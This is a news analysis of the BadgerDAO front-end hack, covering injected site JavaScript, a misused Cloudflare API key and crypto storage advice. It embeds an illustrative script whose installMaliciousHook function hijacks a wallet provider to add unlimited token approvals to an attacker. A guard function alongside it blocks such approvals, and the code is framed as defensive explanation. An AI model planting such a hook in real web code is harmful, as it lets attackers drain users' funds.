BadgerDAO was a fairly low-key crypto project, quietly working to serve growing markets for investment products in the decentralized finance space. But last week it was rocketed into the limelight for one of the worst reasons possible — its website was hacked and thieves stole $120 million in crypto assets.
The incident showed how risky and vulnerable digital tokens can be, even though blockchain technology is purportedly highly secure. Because the incident involving BadgerDAO was a “front-end” attack, its insurance policy from Nexus Mutual also doesn’t cover losses from it. While BadgerDAO took appropriate steps to contain the damage, hired a data forensics firm and looped in law enforcement, it’s unclear whether the victims will ever see their money.
In a last-ditch attempt to negotiate with the hackers, BadgerDAO also appealed to their sense of decency and asked for their assistance. The affected assets involved wrapped bitcoin, a version of bitcoin that exists on Ethereum’s blockchain.
“You have taken funds that do not belong to you but we are willing to work with you and compensate you for identifying this vulnerability in the systems,” the crypto collective said in a public post on its site. “We are providing you with a direct line of communication to discuss a peaceful resolution without involving any outside parties.” The DAO also implored its members to “be patient.”
We also don't know what the collective (a DAO, or decentralized autonomous organization, is formed via blockchain and lacks a centralized leadership structure) could have done to prevent or mitigate the attack.
In a post mortem report released yesterday, the group explained that the hack appeared to stem from someone injecting malicious JavaScript into BadgerDAO’s website interface. The script, which may have been active on and off since Nov. 10, intercepted transactions submitted through the site and inserted requests that, once a user approved them in their wallet, let the attacker move that user’s tokens. It ran at random intervals to avoid detection, so the attack went unnoticed for some time.
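To make the mechanism concrete, the following is an added illustration, not BadgerDAO’s code or the attacker’s script. It models an injected page script that monkey-patches the wallet provider so a user’s ordinary vault deposit is preceded by an unlimited token allowance to the attacker, and the kind of allow-list check a wallet can apply to refuse it. The addresses, the token and vault contracts, and the vault’s `deposit()` selector are assumptions for the example; the ERC-20 `approve` and `increaseAllowance` selectors are the standard ones.

```javascript
// Constructed illustration of a front-end "transaction interception" attack
// and an allow-list check that catches it. Not BadgerDAO's code or the
// attacker's script; addresses and the vault deposit() selector are assumed.
const ATTACKER = "0x" + "ab".repeat(20); // assumed attacker-controlled address
const USER     = "0x" + "11".repeat(20); // assumed victim
const TOKEN    = "0x" + "22".repeat(20); // assumed ERC-20 token contract
const VAULT    = "0x" + "33".repeat(20); // assumed legitimate dapp contract

// Real ERC-20 selectors: first 4 bytes of keccak256 of the signature.
const SELECTORS = {
  "0x095ea7b3": "approve",           // approve(address,uint256)
  "0x39509351": "increaseAllowance", // increaseAllowance(address,uint256)
};
const MAX_UINT256 = (1n << 256n) - 1n;

// ABI-encode <selector>(spender, amount): 4-byte selector + two 32-byte words.
function encodeAllowanceCall(selector, spender, amount) {
  const spenderWord = spender.slice(2).toLowerCase().padStart(64, "0");
  const amountWord = amount.toString(16).padStart(64, "0");
  return selector + spenderWord + amountWord;
}

// Parse calldata; returns null unless it is an approve/increaseAllowance call.
function decodeAllowanceCall(data) {
  if (typeof data !== "string" || data.length < 138) return null;
  const fn = SELECTORS[data.slice(0, 10).toLowerCase()];
  if (fn === undefined) return null;
  const spender = "0x" + data.slice(34, 74);         // low 20 bytes of word 1
  const amount = BigInt("0x" + data.slice(74, 138)); // word 2
  return { fn, spender, amount };
}

// Stand-in for an EIP-1193 provider (window.ethereum). Real providers return a
// Promise; this one is synchronous so the example runs deterministically, and
// it records each eth_sendTransaction instead of broadcasting it.
function makeProvider() {
  const sent = [];
  return {
    sent,
    request({ method, params }) {
      if (method === "eth_sendTransaction") sent.push(params[0]);
      return "0x" + sent.length.toString(16).padStart(64, "0"); // fake tx hash
    },
  };
}

// What an injected page script can do: wrap request() so the user's real
// transaction is preceded by an unlimited allowance to the attacker. If the
// user clicks through both wallet prompts, the attacker can later drain the
// token with transferFrom.
function installMaliciousHook(provider, attacker, token) {
  const passThrough = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method === "eth_sendTransaction") {
      const tx = args.params[0];
      passThrough({
        method: "eth_sendTransaction",
        params: [{ from: tx.from, to: token,
                   data: encodeAllowanceCall("0x39509351", attacker, MAX_UINT256) }],
      });
    }
    return passThrough(args);
  };
}

// The check: refuse allowance grants to any spender not on an allow-list. It
// must sit below page scripts (where the wallet holds the keys) so the page
// cannot wrap around it; here it is installed before the malicious hook.
function installApprovalGuard(provider, trustedSpenders) {
  const trusted = new Set(trustedSpenders.map((a) => a.toLowerCase()));
  const passThrough = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method === "eth_sendTransaction") {
      const call = decodeAllowanceCall(args.params[0].data);
      if (call && !trusted.has(call.spender.toLowerCase())) {
        throw new Error(`blocked ${call.fn} to untrusted spender ${call.spender}`);
      }
    }
    return passThrough(args);
  };
}

// Run the same user action (a vault deposit) with and without the guard.
function simulate({ guard }) {
  const provider = makeProvider();
  if (guard) installApprovalGuard(provider, [VAULT]);
  installMaliciousHook(provider, ATTACKER, TOKEN); // the page's script wraps last
  const deposit = { from: USER, to: VAULT, data: "0xd0e30db0" }; // deposit(), assumed
  try {
    provider.request({ method: "eth_sendTransaction", params: [deposit] });
    return { blocked: false, sent: provider.sent };
  } catch (e) {
    return { blocked: true, reason: e.message, sent: provider.sent };
  }
}

console.log(simulate({ guard: false }).sent.map((t) => decodeAllowanceCall(t.data)));
console.log(simulate({ guard: true }).reason);
```

Without the guard the recorded queue holds an `increaseAllowance` to the attacker followed by the deposit the user actually asked for; with the guard the injected approval is rejected before anything is signed. The point of the layering is that a check implemented in page JavaScript can be wrapped by the same injected script, so the decision has to be made where the keys are.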
The other main issue appears to have involved access to Cloudflare through an API key. An API key is a bearer credential: multi-factor authentication on the account’s login does not protect it, so keys need to be narrowly scoped, rotated, and audited for unexpected creation or use. While multi-factor authentication is becoming a more common security feature in many organizations, gaps in how it is implemented, and in awareness of what it does and does not cover, make it less effective than it could be.
In the event of a hack, the first thing an affected entity should do is freeze whatever it can. Once it became aware of the problem, BadgerDAO did this, pausing all of its smart contracts and recommending that users immediately stop sending any transactions to the malicious addresses. But as noted above, the attack may have been going on for a month before it was detected, so freezing the platform could not undo damage that had already been done.
The primary issue is that even with these steps taken and an investigation underway, there is little substantive redress for victims of crypto hacks. Experts agree that the best defense is to avoid being hacked in the first place. To that end, there are several ways to secure your crypto against theft.
Many well-known platforms to buy crypto are considered to be secure. Platforms like Kraken, for example, have a reputation for particularly high security (though Kraken is also considered to be less intuitive to use for beginners). But when it comes down to it, the only truly secure place to keep crypto funds is offline. Cold wallets exist for this purpose: hardware devices that hold the private keys controlling the funds without ever being connected to the internet.
Crypto security experts recommend never keeping holdings on an exchange for longer than necessary. For one thing, a cryptocurrency exchange operates on a sort of IOU basis (not unlike a savings account at a traditional bank): there is no currency set aside for you, only the exchange’s obligation to pay it.
This means if an exchange goes under (which has happened), that money is not guaranteed to you. And unlike some institutions, the Fed is not going to bail out a failed crypto exchange. Of course, the other reason to store currency offline is because, as we have recently seen, hacks are not uncommon.
The question then becomes, how can we prevent similar incidents in the future? Unfortunately, the answer is not clean-cut. Part of the challenge stems from the fact that it is usually not blockchain technology itself that is to blame, but the layers on top of it. Crypto exchanges holding the currency are susceptible to hacks through a number of channels even if the blocks themselves are immutable.
Unfortunately, in order for cryptocurrency to have the same financial security as fiat currencies, there will likely need to be greater regulation. This may run counter to the original intent of DeFi, but law enforcement resources and government oversight are part of what makes a traditional bank account a much less risky place to keep money.
Many world governments are now looking to digital fiat currencies — an interesting blend of crypto and traditional. But for the time being, it appears the volatility of the crypto market is not the only risk traders take when deciding to invest.
The investigation is ongoing, and BadgerDAO appears to be making concerted efforts to communicate their progress to community members. But the fact still stands that there is limited recourse for such attacks, and cryptocurrency is never a sure thing when it comes to financial security. In the meantime, crypto users should learn from this and be vigilant with their individual security measures.